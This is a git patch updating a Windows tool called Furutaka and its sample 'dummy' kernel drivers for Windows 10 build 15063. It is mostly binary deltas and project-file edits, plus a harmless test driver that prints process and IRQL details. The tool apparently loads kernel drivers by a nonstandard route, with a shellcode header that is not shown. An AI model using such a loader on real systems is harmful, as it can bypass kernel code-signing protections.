From 9db2618d9e010213f73cea66987ba674ea1c06ea Mon Sep 17 00:00:00 2001 From: hfiref0x Date: Thu, 20 Apr 2017 16:52:12 +0700 Subject: [PATCH] v 1.1.1 Update for Windows 10rs2 (15063) --- Compiled/Furutaka.exe | Bin 97792 -> 99328 bytes Compiled/dummy.sys | Bin 2560 -> 3072 bytes Compiled/dummy2.sys | Bin 4096 -> 4608 bytes Source/DummyDrv/dummy.sln | 2 +- Source/DummyDrv/dummy/dummy.vcxproj | 138 -------------------- Source/DummyDrv/dummy/main.c | 72 +++++++---- Source/DummyDrv2/dummy.sln | 2 +- Source/DummyDrv2/dummy/dummy.vcxproj | 138 -------------------- Source/DummyDrv2/dummy/main.c | 115 +++++++++-------- Source/DummyDrv2/dummy/main.h | 43 +------ Source/Furutaka/Furutaka.vcxproj | 12 +- Source/Furutaka/global.h | 4 +- Source/Furutaka/main.c | 135 +++++++++++++------- Source/Furutaka/resource.rc | Bin 5702 -> 5702 bytes Source/Furutaka/shellcode.h | 180 ++++++++++++++++++++++----- TDL.sha256 | 30 ++--- 16 files changed, 379 insertions(+), 492 deletions(-) diff --git a/Compiled/Furutaka.exe b/Compiled/Furutaka.exe index 348832ed0a1045401158f57986483f541c339c24..0e7377b10f4a3e72fce606143e3176e66b51c816 100644 GIT binary patch delta 10810 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 diff --git a/Compiled/dummy.sys b/Compiled/dummy.sys index 8a043a68e950b437ff81359a94758e93817e7abe..a28022740c595794f45c407558b29e43c4d26b20 100644 GIT binary patch literal 3072 zcmeHJO-vI}5FQFt1o??c4<3vU0*Zkk0w*I$NlVxbMJh#O^q@<-LPNV--);pwcp=fm ziXq&H7xf~EdNYK0Fc>@#Es=|ViNEnE2QMagTEDm5LJ=?~o=~QlnQ!OK%$ql}>D#W; zMNwdL={B9_bcJu0JzI~OWv@&XH$y#rB$CAi+tl{gD4nx>nqPh~u* zv8cxU-60m&BWgowX>qladNN)2u#q=UD1lu>ZgeBdnN>){e3>T7qjPZ0 z1ZCCw=M{?`KGj52Ya>T6B2@DCgfiCT{Uu`qk0_=>)FSN8+3X?b_<4z>hD65Cu8Cn0 zJwOB2kQaXPF}YV5Pl}hN5iI&x1kNEw)R*(P4YxoC%9=ApRy+ErqnGjC=90@@KrXk> z?QU|3>2K4&(g94f=rI0E#DBy#{dXPkhNRIYCZ#+jpDZgdR=8wYmNZuS9gUDuyDiVs zM;JV>Af?nB%kxrzG0%S7gYY^86-Ye~q-HJ899I10Y_@!Qe)LEAP!GIry|Ap*^=tEZ z#iaaa)@PXZBI0W+K#Kq^0G$HV0rUw_1u!DO9)NKHDgf>Zumj*R0QP+iWqFQc$L3jS z^eH44*nRiFy{s7Y&OmiG&(qiV0KkN;2g1^XNsDw`(RJvCZ;Q zs$sArtR|LZwKa)@hzwF2h47Q973P1`Jz(7QaZ4@Nm26m_Xv>%Zn__R?k{G@fB zKI(#9UT4q7`><0tJUTb=kdb@y=yY1bYR3lqX7isQjRwIw4M8%TO`#YiNp;TGsdlKQ zFUh&8nKHi+YpoeFL_-&I?juRuQ5E0~=uhvnse-O}$ewAB7->jMlxWx`>#O@a1ETwd gL1Ud&j-bQ-zWyMOYKYWK-5BIrtU(HAm)IY0i_fe7#?kQWZA%Il4l4J>VVSop!7B<9Ra0b`kC067&aTQ zoMq$$8eIs)1_GM}+1@iwG+>{^!C5c-;QxQ0Ue-7N|Nr;s4dt3cAD`$k$CzkCbWV4q%~3gb)0C;y9X1gqE$Qqe0~0y3bNw-!kGbRY2P zKK);GB~a$|`7@}%BQ+-{Um>k%vIM6!6T_Lwp_~??3}?=0AUXaJh%GQtQA~-jmnXmC jQjy4G_D*$4%}K0utw>ESEy>K!3&|)-O-z~0!(9acyit+V diff --git a/Compiled/dummy2.sys b/Compiled/dummy2.sys index 959260ac79fe10d23e48cf7e1fed10ceb20622e6..0b1cc6d1befdd42a0b56870ea914ef3e66054d5c 100644 GIT binary patch literal 4608 zcmeHKU2GIp6h7VlSSn>J=_rXP1KB1JNnI=^7(>`PQ<;@5UA8SEHd(gYp&eOvm)U74 z#PE{^WF6LEd4Yrn;)B28!GvE428CE6C6GoF5D|z`G5EuSC?V?j-8(aM3oQ@$Ks4OV zx#!Gx&pG#;Gk5R3)3|sm6%$bj$g+qIfU_3h{hhnh7#=t2qj9un%*n|Iib5wRw{&S4 zF|DUM_1JPT9!n-uhS;u(dUsOPlA_$yEG|!VsI`@q6+XxHj)6x%IlsHRZ-|V(b9ko6 z$9>;`ch$Yw_ciAqa30a(T}*eh$ifXo9h*vM&FbrmT%D^lg&y>bC8_|z5@js_s$v2K zidfHN4^bJa;Sz%>41&!g+lY#22~=$(m)-t+6XE6;14L7~i1kjp`C?hsiMiMnd_j+hZ6>U98C145|^TL2-~rfoeQJ96N9;|jGig^RMxAXY~mS5e^mhdeWzhdrZ`=zq+ckhNg6U^uYW#c*HvGr>v zluVq0iV0((ZdAj38w5+(4XZJo6=a>oL3^7#W~qG)s)KN z-~@JOsQRD^P_%?spx$5H|N48>FO|F@G#B+t<*mE^1RFc?iMKuG`NK$su9P174%3(? z>jraCzmjX3rI@EIp^`_P@F|LE_`>E<#ccBhlc`s)u)!84EcGZen4ABDzl zk1VcXD-7jj-x9c~ha2xy*evy~F@;+rh00|FGvfifua;b&!iB%Fok*?sL}{H zH%2GJvKcz{)B-)_Hcg2dfd_BHU3&>LH9=$EC>lZd9^D%Me~iu@VP4mNDS0`NZESo=jx3Bu8WyxRG`GwUyELO<95=0W z3>UDBI9seq^iCh%xr)w=@CR#grDk;Diq;cLXdPlOC8d&vo=Ql#tlgq7>1xbShoXnQ z4LN#JB9$o^X8CZ)btCIqkE#cgnxSE?)wjBbzFR3fz&4Um+aA&=4&H`UA>$2W;X4lD zAK}_Tp|o)o)m}W!&YXE-_9@B?^O70CkNW}&{57vy-kwTm@sO5WHq0v~|KGGl^>!*r zhi`KDc89<3@PNbJ#68s&JYJr#ya7MH!bXW>!(f zVA;@^?(w^R?(=(FfvSh_Su`Hs5+Xhmz-NNOkOSZ=9C;o1hmL#%yrG(?4La<8Z-5d^ zzTf_n72x;1z~yVFaO~%WByzw-Y$cc_6kX)lYL122)$@-F9N9d`7)MS5VfQ0HjAuZR z-H$|mnE_H61;Xw}XDne46mi|m9t#Y=KicO(1CEy3J({eIX7`T38L9U2tU?{oqX+`VR(n1q>;)j)02r>wU=Ey{zdx-xc-9c delta 1276 zcmb7DU1%It6h1TA*~V-#J0VU}H^wgM#3Ty3vZWPc>4wb6gl=V(vYWG%7|v_d#!_Nq^a}y5gddWD|5;I@OO;3DR|Td>k=8dFh)i339uU96)nCG_U+NxC z!koF)v|G+Y;pzurqW4>fsz0US+wb{~!&f+*c0teJ_ z0Gv^-J{M;1O8sJIm|d4PiQmbrFSsER^H}O_UcvJ?XZ&;1`h=^;WHu4JGosYOzvF&f zW%cl+%#H@v=gs1brtElZV5ez6t-WV1{9MH?P3vnT{wq#!7FjsKC4ghx7$F_-XPR;V zK1E}IhBS=;)(m^GP!ceq7iYtc(O#o>?58XU>vc*4Hsoju&@<*)cW3in_Pw?2_-giM zuCAa{roH2aX>WJ9dd{2KsX)C{pPOTC zpG(@(&A&M>48;Pby={8HeyCw$kyY0`kXrhS^JFnQX%-6?-QL>L3W#QLa2l#~(^U)e zUek@ah0$1^gKod3RpGLnA!}E3$jbH(S>F!qd1Cj;<>lqdlehE=jRehI>_k(SK&&Oy z%@)L~eUk%7!#d#OD?T3c@q~{l*4MnTClVrQEd?XvofO%4J4J+bBwuWv4yEuNf&mf{ z3oePV%7XZUpySW{0l7bl@~uP~Bn3SN-0SPpz$3o?4)9PL(TK}W5WNX`hFw?ME2HvZ zp%e?073rzbcoi>o1PnaTTL8Rd!kZgi(=+a<=$e^xXGPbN8FyB6E#(c1t_^$Bf?;@^ ztDk;@Hrm5l!nBj_M{zt`H9vFRp67LzP&&74#TM=ie8ts+pjao(!l}_+Zdd - - Debug - Win32 - - - Release - Win32 - Debug x64 @@ -17,22 +9,6 @@ Release x64 - - Debug - ARM - - - Release - ARM - - - Debug - ARM64 - - - Release - ARM64 - {3D8146DE-8064-46C0-9E70-CEEC357B2290} @@ -45,22 +21,6 @@ 8.1 - - Windowsv6.3 - true - WindowsKernelModeDriver10.0 - Driver - KMDF - Universal - - - Windowsv6.3 - false - WindowsKernelModeDriver10.0 - Driver - KMDF - Universal - Windowsv6.3 true @@ -78,38 +38,6 @@ Universal true - - Windowsv6.3 - true - WindowsKernelModeDriver10.0 - Driver - KMDF - Universal - - - Windowsv6.3 - false - WindowsKernelModeDriver10.0 - Driver - KMDF - Universal - - - Windowsv6.3 - true - WindowsKernelModeDriver10.0 - Driver - KMDF - Universal - - - Windowsv6.3 - false - WindowsKernelModeDriver10.0 - Driver - KMDF - Universal - @@ -118,18 +46,6 @@ - - DbgengKernelDebugger - AllRules.ruleset - .\output\$(Platform)\$(Configuration)\ - .\output\$(Platform)\$(Configuration)\ - - - DbgengKernelDebugger - AllRules.ruleset - .\output\$(Platform)\$(Configuration)\ - .\output\$(Platform)\$(Configuration)\ - DbgengKernelDebugger AllRules.ruleset @@ -143,30 +59,6 @@ .\output\$(Platform)\$(Configuration)\ .\output\$(Platform)\$(Configuration)\ - - DbgengKernelDebugger - AllRules.ruleset - .\output\$(Platform)\$(Configuration)\ - .\output\$(Platform)\$(Configuration)\ - - - DbgengKernelDebugger - AllRules.ruleset - .\output\$(Platform)\$(Configuration)\ - .\output\$(Platform)\$(Configuration)\ - - - DbgengKernelDebugger - AllRules.ruleset - .\output\$(Platform)\$(Configuration)\ - .\output\$(Platform)\$(Configuration)\ - - - DbgengKernelDebugger - AllRules.ruleset - .\output\$(Platform)\$(Configuration)\ - .\output\$(Platform)\$(Configuration)\ - false @@ -192,36 +84,6 @@ false - - - false - - - - - false - - - - - false - - - - - false - - - - - false - - - - - false - - false diff --git a/Source/DummyDrv/dummy/main.c b/Source/DummyDrv/dummy/main.c index dade601..c3cd920 100644 --- a/Source/DummyDrv/dummy/main.c +++ b/Source/DummyDrv/dummy/main.c @@ -1,12 +1,12 @@ /******************************************************************************* * -* (C) COPYRIGHT AUTHORS, 2016 +* (C) COPYRIGHT AUTHORS, 2016 - 2017 * * TITLE: MAIN.C * -* VERSION: 1.00 +* VERSION: 1.01 * -* DATE: 29 Jan 2016 +* DATE: 20 Apr 2017 * * THIS CODE AND INFORMATION IS PROVIDED "AS IS" WITHOUT WARRANTY OF * ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING BUT NOT LIMITED @@ -29,35 +29,57 @@ DRIVER_INITIALIZE DriverEntry; * */ NTSTATUS DriverEntry( - _In_ struct _DRIVER_OBJECT *DriverObject, - _In_ PUNICODE_STRING RegistryPath - ) + _In_ struct _DRIVER_OBJECT *DriverObject, + _In_ PUNICODE_STRING RegistryPath +) { - LARGE_INTEGER tm; - PEPROCESS Process; + PEPROCESS Process; + KIRQL Irql; + PWSTR sIrql; - tm.QuadPart = -10000000; + /* This parameters are invalid due to nonstandard way of loading and should not be used. */ + UNREFERENCED_PARAMETER(DriverObject); + UNREFERENCED_PARAMETER(RegistryPath); - /* This parameters are invalid due to nonstandard way of loading and should not be used. */ - UNREFERENCED_PARAMETER(DriverObject); - UNREFERENCED_PARAMETER(RegistryPath); + DbgPrint("Hello from kernel mode, system range start is %p, code mapped at %p\n", MmSystemRangeStart, DriverEntry); - DbgPrint("Hello from kernel mode, system range start is %p, code mapped at %p", MmSystemRangeStart, DriverEntry); + Process = PsGetCurrentProcess(); + DbgPrint("I'm at %s, Process : %lu (%p)\n", + __FUNCTION__, + (ULONG)PsGetCurrentProcessId(), + Process); - Process = PsGetCurrentProcess(); + Irql = KeGetCurrentIrql(); - do { + switch (Irql) { - KeDelayExecutionThread(KernelMode, FALSE, &tm); - - DbgPrint("I'm at %s, Process : %lu (%p)", - __FUNCTION__, - (ULONG)PsGetCurrentProcessId(), - Process - ); + case PASSIVE_LEVEL: + sIrql = L"PASSIVE_LEVEL"; + break; + case APC_LEVEL: + sIrql = L"APC_LEVEL"; + break; + case DISPATCH_LEVEL: + sIrql = L"DISPATCH_LEVEL"; + break; + case CMCI_LEVEL: + sIrql = L"CMCI_LEVEL"; + break; + case CLOCK_LEVEL: + sIrql = L"CLOCK_LEVEL"; + break; + case IPI_LEVEL: + sIrql = L"IPI_LEVEL"; + break; + case HIGH_LEVEL: + sIrql = L"HIGH_LEVEL"; + break; + default: + sIrql = L"Unknown Value"; + break; + } + DbgPrint("KeGetCurrentIrql=%ws\n", sIrql); - } while (1); - - return STATUS_SUCCESS; + return STATUS_SUCCESS; } diff --git a/Source/DummyDrv2/dummy.sln b/Source/DummyDrv2/dummy.sln index 28627ee..6c35f1c 100644 --- a/Source/DummyDrv2/dummy.sln +++ b/Source/DummyDrv2/dummy.sln @@ -1,7 +1,7 @@  Microsoft Visual Studio Solution File, Format Version 12.00 # Visual Studio 14 -VisualStudioVersion = 14.0.24720.0 